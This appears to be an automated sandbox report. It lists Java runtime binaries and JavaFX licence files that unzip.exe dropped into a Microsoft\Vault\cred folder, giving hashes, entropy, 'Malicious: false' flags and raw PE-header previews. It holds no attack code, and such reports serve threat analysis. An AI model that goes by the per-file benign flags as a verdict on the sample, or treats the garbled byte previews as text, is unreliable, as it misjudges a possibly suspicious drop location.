SSDEEP:	6144:lM1EcZesN/QQFJXRZkPka2MmqnaDWaCJJaAe7zP3riPk00pvRWCXIuA98:s/BXFJXRZwka2g7LszP7ixCXRA98
MD5:	91798750F0A6A24E760DB5EC54A2E382
SHA1:	C44D4C439EA7D2F67635EA21BF02A9018BC37F76
SHA-256:	C47C12D8377D1EC321BE5E03A242C9C7F4427693F28A08B943265B3647870AE9
SHA-512:	228AB167C8ED1ED62A3C69959C20CD0B6B9AD3ABCC283351460F1F148B4ABE7A84F7D458CF7BAE89E5401CFF87B89A4B381DCF3AA4702DF525FEF288C8BCE382
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........c.g.0.g.0.g.0...1.g.0...1&g.0G.+0.g.0G..1.g.0G..1.g.0...1.g.0...1.g.0.g.0.f.0G..1.g.0...1.g.0...1.g.0..)0.g.0...1.g.0Rich.g.0........................PE..L...G`.f...........!...$.N...H...............`............................................@.............................................s...............(.......=..0V..T...........................`U..@............`......d........................text....M.......N.................. ..`.rdata..bg...`...h...R..............@..@.data....-......."..................@....rsrc....s.......t..................@..@.reloc...=.......>...P..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\ssvagent.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	85632
Entropy (8bit):	5.96515353072807
Encrypted:	false
SSDEEP:	1536:f8tNbQpaiu9jfGZ7s8nBsWs8nBsps8nBshkuXc2CXf7dAxR:UN2L8DrEhkI1CXf4
MD5:	E3C4E7F11216C7452AFDF3EDCF7B8A31
SHA1:	2021633B9B71FAEA79960DBAEA56394F0FAC883B
SHA-256:	540AAEB6B1A436067EEC72DFCF743BD62E2AAE55BD927EA6D46D784DAB9FC2C4
SHA-512:	862C7C1BF4D9D293467DE428DC431400240B109F11B93C433EEBFE588AEC36A155F73DACA785655CB194C23696C01C38AE4FA0D41CA52F6A3DE9247550F65E89
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K...%...%...%......%...$...%...!...%...&...%...!...%...$...%...$...%... ...%... ...%.......%...'...%.Rich..%.........PE..L...N`.f...............$.\|...........u............@..........................P............@.....................................@....0...............&...(...@..D...X...T...............................@...............T............................text...l{.......\|.................. ..`.rdata..4...........................@..@.data........ ......................@....rsrc........0......................@..@.reloc..D....@......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\sunec.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	143488
Entropy (8bit):	6.606736571321661
Encrypted:	false
SSDEEP:	3072:W5jbWp6ha7DQ5P+nXvqGDhyxFSEh+Ilou1UFeaTH+mCaP:W5jwY5QHDhQYEh5lou1Me45
MD5:	3BB8D509CF5CD1643DA313A1D696E3A7
SHA1:	B7292895BC130A2B8E7B734D1BFF1B34A633C32C
SHA-256:	5A3683ACAFACF2969497114F311FA00A2938C059D0C3E1725A33FDF39DF7D2D7
SHA-512:	0BF1447E28D3BA9420A6F9B08B98735E42BA151E46F480E164894C6A80CEDCB1B316933C277F83BFE21D87515790E08DE879EE7FD944BECB7ED4B05B3A5BACE6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........B..B..B..K.V.J....@.....A..B..s...8.C.....Q.....H....E..[...C..[...Y..[..C..[.:.C..[..C..RichB..........PE..L...}^.f...........!...$.P...........R.......`...............................0......50....@.........................`...<................................(......h.......T...........................H...@............`...............................text...%N.......P.................. ..`.rdata..f....`.......T..............@..@.data...............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\sunmscapi.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39040
Entropy (8bit):	6.595572143166708
Encrypted:	false
SSDEEP:	768:0wLHbmswDHoSDysax/d+4OUFhEs0m04WgrlmlOAgTYiiAMxkE3:vmFai4lEs0m0erlmlOHT7gxL
MD5:	99A18D92C0C0ABE657D7E87D803EEBA7
SHA1:	0374DAE46D197E19FACAF41C4CC1D1581BBC1100
SHA-256:	6615B9A4E5A3ACA7D17BA0E7E0C58D55DFF9C5C888A50D3FDD14C0288A3E59CD
SHA-512:	A055284EB985392E3A02FFE379C63C2F48837E4ECBB7AC4405B5894F910C95960B2EA8B5BD7F8630E74811B3DAF9AADC226EA93177C29CCFD0D48A4067D425E2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.......,.[.-...,.[.(...,.[./...,.[.)...,..-...,...-..,..)...,..,...,......,......,.Rich..,.................PE..L...}^.f...........!...$.<...4......??.......P......................................1.....@..........................a.......g.......................p...(......t...pX..T............................W..@............P..p............................text....:.......<.................. ..`.rdata..&"...P...$...@..............@..@.data................d..............@....rsrc................f..............@..@.reloc..t............j..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\t2k.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	219264
Entropy (8bit):	6.7308620485756725
Encrypted:	false
SSDEEP:	6144:unVJBqLlwPV0Jobv4s1kdKSJh9vLzPDts3bnGb:KV4wPV0uveKST9zbDyDGb
MD5:	6D9D2143BA1953BBF236D98262C0C736
SHA1:	1A245AE8D480CA322C1DB2C656EC0F8E78141A7B
SHA-256:	DB9FEA210E84180B20FD092724C705ABCC206F218E212C87C9981440A9F3544B
SHA-512:	9070070520C30DDF8D162B9EC3943005A5A7A9D44141FB3452484F4838FF5999DEB34ED6F6BEC70CB5562AA8FB883DFE2E401C3AB96F8911B48922F743539E33
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?i..^.L.^.L.^.L.&.L.^.L. .M.^.L.&.M.^.L. .M.^.L. .M.^.L. .M.^.L.!.M.^.L.^.L.^.L.!.M.^.L.!.M.^.L.!.M.^.L.!.L.^.L.!.M.^.LRich.^.L........................PE..L....^.f...........!...$.....................................................`.......u....@.............................h...(........@...............0...(...P..8...P...T...............................@............................................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....rsrc........@......................@..@.reloc..8....P....... ..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\tnameserv.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23168
Entropy (8bit):	6.759247623269435
Encrypted:	false
SSDEEP:	384:0Mb500JRlSjo5yJz82VWefWO44IYi1o7DAM+o/8E9VF0Ny55t:0Mb500fZQ86bfWfYiqAMxkEH
MD5:	B20865B510894F7401832EAEDA62F126
SHA1:	F99BA0EFF6C7BEFD764CA86F881D207D2BF8CA76
SHA-256:	331CD7AC0C7F04428E2E3FF437127176122BB6014CCF2E6671997AE23D106176
SHA-512:	B1A123203D225EBB0B1E6E1B32A2AD54DAF5A45E6F23261C31DDACC23718BDC727D381619D1E6F1A2BC15D781326E9D6D3C473723B739870AAD183C24D576BAB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..... ............... ....@..........................`......@.....@..................................'.......@..h............2...(...P......8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc.......P.......0..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\ucrtbase.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1118728
Entropy (8bit):	6.790992878004916
Encrypted:	false
SSDEEP:	24576:K4h8VBDlcikOq8x83ISuTJQuR0Z7mcvIZPoy4U4:K08jhTeuTJQuCZw4
MD5:	2EBCF1F6D33C7A5FAB7B29CBEEBA7B17
SHA1:	0956176904C6C584EC04DBDD2A219F910AF3B191
SHA-256:	E756BDCB6FE484DF3D804317190145232F690FD43EEDD051F0BCDF0F90A87943
SHA-512:	6D30ADAB1D961DC253DC381E49960AC8DCDED2F885A9D9AC9E7605FD881099C115E0D97BC858E7ADAD9EA0F7EC70DA3916A20C6448796A6F0765647EFF3385B5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.@yu..u..u..\|.F..u./...>..t..>.+c..>..+t..>.-+...>.+++..>. +...>..t..>.,+t..Richu..*........PE..L...'t.............!.....,..........`........@............................... ............@A.........................^......xb...........................&.........\...T............................"..@............`..p............................text...P+.......,.................. ..`.data...4....@.......0..............@....idata..2....`.......@..............@..@.rsrc................V..............@..@.reloc..............\..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\unpack.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	74368
Entropy (8bit):	6.555218523847208
Encrypted:	false
SSDEEP:	1536:hh/7D8nKlzts11tORq8EA7fnH6xE7IgLk+8WvaQ7Zxt:hSKZto3ORN9bqE7Igg+8WvVZ
MD5:	1F053827080CDEDD5076A2221CB23810
SHA1:	F5C2EEFCAB89BFC34AC84B41019CC81DC3ACC26D
SHA-256:	192A820C6A4496C2F8F9C7CA21F9A8BE959973A1FC3009435563C1C38D1E47F7
SHA-512:	F538477FEAF301859116B14A9A588F85B1A7EF73B8B824E9E8F69F2D253CCBF3A87D526A1DCD2C8BA4E1857320D56198BDEFA18D54C1D13B512F865E88554589
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.a....L...L...L...L...L...M...L\..M...L...L...L...M...L...M...L...M...L...M...L...LV..L...M...L...M...L...L...L...M...LRich...L........PE..L....^.f...........!...$.....T...............................................@......d.....@.........................0.......D........ ...................(...0..........T...............................@............................................text............................... ..`.rdata...5.......6..................@..@.data...............................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\unpack200.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	182400
Entropy (8bit):	5.999014297033153
Encrypted:	false
SSDEEP:	3072:ZVD8X/iZXen9LWxBkcIEtNt526BrUI/EeaSNAroAxYte5MwAC8Aj:X8Xc/xWAKeaSNAroAxYwTVj
MD5:	82806FE433AF1538A96A2CFC5DA18E7C
SHA1:	AE1F1213190D954A6852EFFE3367249AC4A8FBEA
SHA-256:	1E9D5DAC775D277D2B21E6C04FAF30FABED78E6A258A3968EBA03EFB807CEFC4
SHA-512:	1DC18DBC0A69AF53E8170B45DB5CFFAABD98AAF7276A4049E0289A3CFC293B98D9931A5AFA4AF685D4358030E27E68FE4E9CF3603E738A2B880AF6D3D9EF2D22
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K.Wj..j..j..cR..\|...T..h..!R..i..j..%...Tr.i...T..y...T..f...T..n..sU..`..sU..m..sUp.k..sU..k..Richj*..........PE..L....^.f...............$............A.............@.................................Q-....@.............................................H................(...........f..8............................e..@............................................text...b........................... ..`.rdata..5...........................@..@.data................h..............@....idata...............x..............@..@.00cfg..............................@..@.rsrc...H...........................@..@.reloc..3...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	90520
Entropy (8bit):	6.936349345750277
Encrypted:	false
SSDEEP:	1536:Lb8h/b8bgkjohTX6pz0y9v+xSUKF1IuCmgnKecbWJdazlTjznFKwcjzBG:LbWUgkOTX6ey9v+xSjFyuBecbWnaNjjb
MD5:	1D4FF3CF64AB08C66AE9A4013C89A3AC
SHA1:	F9EE15D0E9B0B7E04FF4C8A5DE5AFCFFE8B2527B
SHA-256:	65F620BC588D95FE2ED236D1602E49F89077B434C83102549EED137C7FDC7220
SHA-512:	65FBD68843280E933620C470E524FBA993AB4C48EDE4BC0917B4EBE25DA0408D02DAEC3F5AFCD44A3FF8ABA676D2EFF2DDA3F354029D27932EF39C9FDEA51C26
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........j..9..9..9...8..9..Y9..9..9...9y..8..9y..8..9y..8...9y..8..9y.59..9y..8..9Rich..9........PE..L...b............."!...$.....................................................P.......h....@A................................. .......0...................O...@.......$..T............................#..@............ ...............................text............................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\verify.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	47744
Entropy (8bit):	6.796539854724937
Encrypted:	false
SSDEEP:	768:Ye5CMul1V9ZzJxzhG3z319jkb548jZnUl2Rf4t4FT96bJpiIKpOHWzt+2TemYieL:L5CMul1pdnUlsAtAT96bJpA5+2Tem7sr
MD5:	60E845BB0E3015821D47F98E55C7C361
SHA1:	62A280B0E6C014897953FC4881C725148F042360
SHA-256:	AD8BA34225665B2F83DF0C4D4267182B1C247CFEC85818EC4130A9830FE3DAD1
SHA-512:	C48D5C3EC05364373FA145B8EF7286E123650B2B327CCDC2D575FC6AF3A77ED81FAA77D804E738C9F09FEB537D938D3F9EBABAC3F6E0B979A774B050E11BD69D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................W........W.....W.....W..................................Rich..........................PE..L...}^.f...........!...$.Z...8......P_.......p............................................@.................................X............................(..........`...T...............................@............p..0............................text....X.......Z.................. ..`.rdata..t%...p...&...^..............@..@.data...\...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\w2k_lsa_auth.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28800
Entropy (8bit):	6.648908809838213
Encrypted:	false
SSDEEP:	768:z23Q1LneyoeJ6YnwtNoZTUH5QkOH0bGGGGNET7T7T7T7lW6/f/va4YiK4AMxkE59:z23QBe26YnwtNoZTUH5QkOH0bGGGGNER
MD5:	3823CB54557C476AA85AB33DA94513A7
SHA1:	F0EAC74D987554DF4B4F41EACB80434C6530EFFD
SHA-256:	EE5DEB536C1A52402C9B0B0BC902EF5B30457AACD6E5A0739C4B865219653EBF
SHA-512:	9762324D4163112C8B7C898BBC153818F5F5619FC64C6F2E3AD5D7F7664BB2470C8A30E16AC35CC44E89CDD45C56DAC9EE697C3128CFF0BE9910D714BEF7AD8A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._.Qk1.Qk1.Qk1.X...Wk1...0.Sk1...4.Zk1...5.[k1...2.Pk1...0.Xk1.Qk0.ek1.H.5.Sk1.H.1.Pk1.H...Pk1.H.3.Pk1.RichQk1.........PE..L...}^.f...........!...$. ...(......f$.......0...........................................@.........................pA......hB.......`...............H...(...p.......<..T...........................0<..@............0...............................text...'........ .................. ..`.rdata..6....0.......$..............@..@.data........P.......>..............@....rsrc........`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\wsdetect.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	195712
Entropy (8bit):	6.588688781681821
Encrypted:	false
SSDEEP:	3072:LmexeaKqevBmvNGRxZEog7WQT6f/DJ6C7ENdOSlJjmQFgY2TIg5PE4EiG:yerKv6a4ogqQWf7JLoHk3Ig5P0d
MD5:	D5B4023EECFDC70E5A4D3F5D4887DF3C
SHA1:	DEFE06E70CA0173E7F7C24B63B8D05211C81FBDC
SHA-256:	2BB84B3DABE9B500BEA873082D4FB244A3CA4B99C5C7DD971CA0318A93401C61
SHA-512:	061C88E8A81548B286B6F54E8FAEF45090155C64AE4142AFD4ED978B53B15FFABF4C596CDC223959031C09F8EF2DD08F0E822DBC4C6D4BE1FF491337FA047590
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^.a-...~...~...~Q......~Q......~...~...~.......~.......~....+..~Q......~Q......~...~...~.......~.......~...~...~.......~Rich...~........................PE..L...Z_.f...........!...$............/................................................G....@.........................`...................P................(......T"...Z..................................@.......................@....................text...L........................... ..`.rdata.............................@..@.data....#..........................@....rsrc...P...........................@..@.reloc..T".......$..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\zip.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	81536
Entropy (8bit):	6.985574978255577
Encrypted:	false
SSDEEP:	1536:hTdtmatbbxN62dbpoSvNWyF8aGoS3BIOQIO18LcZ4G7xxH:hTdhvN6Ypd1P8aGHrG18LcZ4GL
MD5:	05583A154352592C84782EBE9DF03D15
SHA1:	94DF6FFBAF7E5B2B3FFBBF71B5236E7A538F6E2D
SHA-256:	6B1F7491F0893B4727E97874FC5358978D06D360BECD0E69CBE5F3ACE87BEA03
SHA-512:	61E2A084A219C65B697B8119F322B02B5686BE105FF70DFABB13F7D994ABF0084B8FC1BA343F1357C31871A35941F986C3F52235719D3151915B4CAB3773DFF4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K].K].K]...].K]t.J\.K]..J\.K]t.].K]t.N\.K]t.O\.K]t.H\.K]..J\.K].J]..K]..O\.K]..K\.K]..].K]..I\.K]Rich.K]........PE..L....^.f...........!...$.....r...............................................`.......d....@..........................................@...................(...P..x...p...T...............................@............................................text............................... ..`.rdata...c.......d..................@..@.data........0......................@....rsrc........@......................@..@.reloc..x....P......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\directshow.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1165
Entropy (8bit):	5.191749491970965
Encrypted:	false
SSDEEP:	24:jzIDkrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF51:fIDkaJHlxE35QHOs5exm3ogF51
MD5:	B1047DB8237B15D97B1DD072F71F4D15
SHA1:	2484425DF3BE1049DE4016ED88E5518AA9751B35
SHA-256:	D847DA5757A30D093DB3F90A0BAC9B1699A52965DAA3EC5DEDF3EBF14C81C698
SHA-512:	BBD78681A97ABF5FE515BE598F81EDB4D2140E0DD12959F3AB6F89609E9962991BB5BFE09EED67CDD29529C51ECBDF59C37A61BB0D592250B0F9AD0C6090798B
Malicious:	false
Preview:	## Microsoft DirectShow Samples v156905..### MIT License (MIT).```..Copyright (c) 1992-2004 Microsoft Corporation. All rights reserved...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABIL

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\glib.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	34804
Entropy (8bit):	4.83839232024703
Encrypted:	false
SSDEEP:	384:6/x3gOE56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CU:6zE5trLeDnFMz1ReScmc7GshZuQ11y
MD5:	3970B7F8AF9A4CAA4B37F22252ED58FC
SHA1:	90B120530D60549476837E96788C56068902894A
SHA-256:	71DB3F4BA381B6E85F6B2108021099FD3E6B951FCFFA9C47226DC370BC961AEE
SHA-512:	5769E83E580E092BFB482E18E8EC07BF4E439E8E95BCAB51CC60CCAE93C2FAFC5DC7F87112D33586F64008F5D61A9B3DA041CD35D514F842A0FCAB5B2A329768
Malicious:	false
Preview:	## GNU Glib v2.78.1..### Glib Notice.```..You are receiving a copy of GNU Glib, Version: 2.78.1 in either source or.object code in the JavaFX runtime or JavaFX SDK. The terms of the.Oracle license do NOT apply to the GNU Glib, Version: 2.78.1; it is.licensed under the following license, separately from the Oracle programs.you receive. If you do not wish to install this library, you may delete.this library:.. - On 32-bit Linux systems: delete $(JAVA_HOME)/lib/i386/libglib-lite.so. - On 64-bit Linux systems: delete $(JAVA_HOME)/lib/amd64/libglib-lite.so. - On Mac OS X systems: delete $(JAVA_HOME)/lib/libglib-lite.dylib. - On Windows systems: delete $(JAVA_HOME)\bin\glib-lite.dll..A copy of the Oracle modified GNU Glib library source code is located.in the following OpenJDK git repository:.. https://github.com/openjdk/jfx..You can use git to clone the repository or you can browse the.source using a web browser. The root directory of the GNU Glib source.code is here:.. rt/modul

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\gstreamer.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	38079
Entropy (8bit):	4.928501784330518
Encrypted:	false
SSDEEP:	768:R3/OQE5trLeDnFMz1ReScmc7GshZuQPhQ6FdRZ89lg:R3/OQE5N7PhcmCGUZfhdbZgg
MD5:	D0929E423A9B33F4EB770E79F66EE9E7
SHA1:	693CB0F26545CB564FA409A3488E9CA54C5F0727
SHA-256:	6978128AEEAF8DBC88C50C8870B96C73F2F2B67B889FE03404E05326FC8CB6F9
SHA-512:	66962D1589B8BFCF7279E0211D3A695596EBFB2696E86B1F496D6E1CCC6806CA75FF72DE125D115754E404364A3B89CB8489BBCD6013F575AF28405CEAA49A62
Malicious:	false
Preview:	## GStreamer v1.22.6..### GStreamer Notice.```..You are receiving a copy of GStreamer, Version: 1.22.6 in either source or.object code in the JavaFX runtime or JavaFX SDK. The terms of the.Oracle license do NOT apply to the GStreamer, Version: 1.22.6; it is.licensed under the following license, separately from the Oracle programs.you receive. If you do not wish to install this library, you may delete.this library:.. - On 32-bit Linux systems: delete $(JAVA_HOME)/lib/i386/libgstreamer-lite.so. - On 64-bit Linux systems: delete $(JAVA_HOME)/lib/amd64/libgstreamer-lite.so. - On Mac OS X systems: delete $(JAVA_HOME)/lib/libgstreamer-lite.dylib. - On Windows systems: delete $(JAVA_HOME)\bin\gstreamer-lite.dll..A copy of the Oracle modified GStreamer library source code is located.in the following OpenJDK git repository:.. https://github.com/openjdk/jfx..You can use git to clone the repository or you can browse the.source using a web browser. The root directory of the GStreamer sou

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\icu_web.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	22477
Entropy (8bit):	5.121031553425209
Encrypted:	false
SSDEEP:	384:IQv7jCmh72EJDrPg/sparftM6rs6NTCeFrsirsOu6NPrsirshu6NTsPmtq0vrrXK:vjOm12EJDbg/carRrTCetu6NPt56N4mo
MD5:	7839C8EB67E64A94B74EEE6AEC6F1678
SHA1:	FD9C31E1F1EEF6A8EA963BB60B67190175261C4F
SHA-256:	30BD18D716B50D6341CAE7721AB86761B59C4D26A85D0A2520E2D6C30BFDA9ED
SHA-512:	BC280EC169FC52A8BE71474D9E3AB74E926881FA8984D52FBC820CC9F522609F1DF72EB1187AA5E84E626D7B21E38CAB5CAC81BE17EA4D3D3A99F395A46B45C6
Malicious:	false
Preview:	## IBM International Components for Unicode (ICU4C) v74.2..### ICU License..UNICODE LICENSE V3..COPYRIGHT AND PERMISSION NOTICE..```..Copyright (C) 2016 and later: Unicode, Inc. and others..Copyright (C) 1996-2017, International Business Machines Corporation and others. All rights reserved..Copyright (C) 2007 Google Inc. All rights reserved..Copyright (C) 2001 and onwards Google Inc..Copyright (C) 1999-2013 IBM Corp. All rights reserved..Copyright (C) IBM Corporation, 2000-2016. All rights reserved..Copyright (C) 2006-2012 the V8 project authors. All rights reserved..Copyright (C) 2001-2015 IBM and others. All rights reserved..Copyright (C) 2010, Yahoo! Inc..Copyright (C) 2008-2015, Google, International Business Machines Corporation and others. All rights reserved..NOTICE TO USER: Carefully read the following legal agreement. BY.DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING DATA FILES, AND/OR.SOFTWARE, YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO BE BOUND BY, ALL OF THE.TERMS AND COND

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\jpeg_fx.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1990
Entropy (8bit):	4.74017405981536
Encrypted:	false
SSDEEP:	48:jkt1O+R+5bwcWFWV52sRZeSLNCAN1gQ3GbQ:d8PWf5ZoAzgM
MD5:	6204F1252C7729539679277F68222DFC
SHA1:	708E2BC41E5699690597169C34E4B00B856225EA
SHA-256:	4C6B4E8E8C31D6E304C354A5E37D39A73F855E79BB40A6D4285BB440F738EDA6
SHA-512:	9CC5A35EC26F954C86ECDE4AF8485B4480EBF323A97F4476656AE3326B0590864A5E94EB0C30DAC23B23E74F5BE241F93341921F7C9E4175480D9108A65408DE
Malicious:	false
Preview:	## Independent JPEG Group (IJG) JPEG version 9f..### IJG License.```.Copyright (C) 1991-1998, Thomas G. Lane..Copyright (C) 1991-2024, Thomas G. Lane, Guido Vollbeding...The authors make NO WARRANTY or representation, either express or implied,.with respect to this software, its quality, accuracy, merchantability, or.fitness for a particular purpose. This software is provided "AS IS", and you,.its user, assume the entire risk as to its quality and accuracy...This software is copyright (C) 1991-2024, Thomas G. Lane, Guido Vollbeding..All Rights Reserved except as specified below...Permission is hereby granted to use, copy, modify, and distribute this.software (or portions thereof) for any purpose, without fee, subject to these.conditions:.(1) If any part of the source code for this software is distributed, then this.README file must be included, with this copyright and no-warranty notice.unaltered; and any additions, deletions, or changes to the original files.must be clearly indicated

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\libffi.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2562
Entropy (8bit):	5.181762089837221
Encrypted:	false
SSDEEP:	48:TDiJTfPvGt7ICWPH+sfINi3OMFQzMARRkX7Bm2itNvXIpeBVeVvZY:T8Put0CuHXONzMARRkA3vXIEBAvZY
MD5:	025E7CC1BBAE3EE540A4F6BCF0FADEBF
SHA1:	2C9D8B71CF697C4ECD5A1D74F3762F8E6E9ECF36
SHA-256:	8B7FFA48FB4B8AAC3FFDE9D014A4888F1B325199C4BEB710D13898ACF3C370BF
SHA-512:	1721254299CBF8DC150269217E82CC4F8D56E89A59B8F95C62341CC944683C3DE22C72C6685B6E69D1036CB145626053B202D9D274127B2978571282F25EBC40
Malicious:	false
